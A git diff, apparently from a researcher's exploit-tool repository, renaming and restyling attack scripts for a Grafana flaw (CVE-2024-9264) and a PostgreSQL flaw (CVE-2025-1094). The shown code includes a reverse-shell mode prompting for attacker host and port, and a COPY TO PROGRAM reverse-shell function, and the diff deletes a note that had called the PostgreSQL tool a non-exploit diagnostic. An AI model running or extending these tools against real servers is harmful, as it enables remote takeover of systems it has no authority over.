diff --git a/CVE-2024-9264/exploit.py b/CVE-2024-9264/CVE-2024-9264_Tool.py similarity index 92% rename from CVE-2024-9264/exploit.py rename to CVE-2024-9264/CVE-2024-9264_Tool.py index 6669953..d7cfac8 100644 --- a/CVE-2024-9264/exploit.py +++ b/CVE-2024-9264/CVE-2024-9264_Tool.py @@ -12,16 +12,19 @@ init(autoreset=True) # ------------------------- # 프롤로그 # ------------------------- -print(r""" - _ __ _____ _____ _____ ___ -| | / /|_ _|/ ___||_ _| / _ \ -| |/ / | | \ `--. | | / /_\ \ -| \ | | `--. \ | | | _ | -| |\ \ _| |_ /\__/ / _| |_ | | | | -\_| \_/ \___/ \____/ \___/ \_| |_/ +print(r""" + + ██╗ ██╗██╗███████╗██╗ █████╗ + ██║ ██╔╝██║██╔════╝██║██╔══██╗ + █████╔╝ ██║███████╗██║███████║ + ██╔═██╗ ██║╚════██║██║██╔══██║ + ██║ ██╗██║███████║██║██║ ██║ + ╚═╝ ╚═╝╚═╝╚══════╝╚═╝╚═╝ ╚═╝ + Edited by : secKrity - 이민준 CVE ID : CVE-2024-9264 +Base Score : 9.4 / CRITICAL Affected product : Grafana Vulnerable version : • v < 11.0.5+security-01 • v < 11.0.6+security-01 @@ -223,7 +226,7 @@ if __name__ == "__main__": log_event("Exploit Started") info("Trying to Login...") if exploit.login(): - success("Login Success") + info("Login Success") info("Exploit...") output = exploit.check_vuln() if output: @@ -238,7 +241,7 @@ if __name__ == "__main__": log_event("Exploit with Reverse Shell Started") info("Trying to Get Reverse Shell...") if exploit.login(): - success("Login Success") + info("Login Success") lhost = input("Attacker IP (LHOST): ") lport = input("Attacker PORT (LPORT): ") try: diff --git a/CVE-2025-1094/exploit.py b/CVE-2025-1094/CVE-2025-1094_Tool.py similarity index 90% rename from CVE-2025-1094/exploit.py rename to CVE-2025-1094/CVE-2025-1094_Tool.py index ef07098..7916a8f 100644 --- a/CVE-2025-1094/exploit.py +++ b/CVE-2025-1094/CVE-2025-1094_Tool.py @@ -1,15 +1,4 @@ #!/usr/bin/env python3 -# postgres_diagnostic.py -""" -PostgreSQL 취약점 진단 모듈 (CVE-2025-1094 관련 안전 진단) -- 1) 버전확인 -- 2) CVE-2025-1094 영향 버전 확인 -- 3) '리버스 셸 테스트' (실제 익스플로잇 아님, 환경/설정 안전 진단) -- 4) 종료 - -주의: 실제 익스플로잇/리버스 셸 코드 제공 불가. 안전 진단만 수행합니다. -""" - import sys import logging import re @@ -22,15 +11,17 @@ from psycopg2 import OperationalError init(autoreset=True) print(r""" - _ __ _____ _____ _____ ___ -| | / /|_ __|/ ___||_ __| / _ \ -| |/ / | | \ `--. | | / /_\ \ -| \ | | `--. \ | | | _ | -| |\ \_| |_ /\__/ / _| |_ | | | | -\_| \_/ \___/ \____/ \___/ \_| |_/ -Edited by : secKrity - 이민준 -CVE ID : CVE-2025-1095 + ██╗ ██╗██╗███████╗██╗ █████╗ + ██║ ██╔╝██║██╔════╝██║██╔══██╗ + █████╔╝ ██║███████╗██║███████║ + ██╔═██╗ ██║╚════██║██║██╔══██║ + ██║ ██╗██║███████║██║██║ ██║ + ╚═╝ ╚═╝╚═╝╚══════╝╚═╝╚═╝ ╚═╝ + +Edited by : secKrity - 이민준 +CVE ID : CVE-2025-1095 +Base Score : 8.1 / HIGH Affected product : PostgreSQL Vulnerable version : • v < 13.19 • v < 14.16 @@ -163,7 +154,6 @@ class PGDiagnostic: except Exception as e: # COPY TO PROGRAM을 실행할 권한이 없거나 다른 오류가 발생할 수 있음 log_event("get_reverse_shell", str(e)) - error(f"COPY TO PROGRAM query failed: {e}") return "" # ------------------------- @@ -211,8 +201,8 @@ def print_menu(): def main(): """메인 실행 함수""" if len(sys.argv) < 5: - print("Usage: python3 postgres_diagnostic.py ") - print("Example: python3 postgres_diagnostic.py 127.0.0.1 5432 postgres mypass mydb") + print("Usage: python3 CVE-2025-1094_Tool.py ") + print("Example: python3 CVE-2025-1094_Tool.py 127.0.0.1 5432 postgres mypass mydb") sys.exit(1) host = sys.argv[1] @@ -241,8 +231,8 @@ def main(): ver_str_full = pg.get_server_version_string() if ver_str_full: parsed = parse_pg_version(ver_str_full) - success(f"Server version string: {ver_str_full}") - success(f"Parsed version: {parsed}") + info(f"Server version string: {ver_str_full}") + info(f"Parsed version: {parsed}") else: error("버전 정보를 가져오지 못했습니다.") # warn 대신 error 사용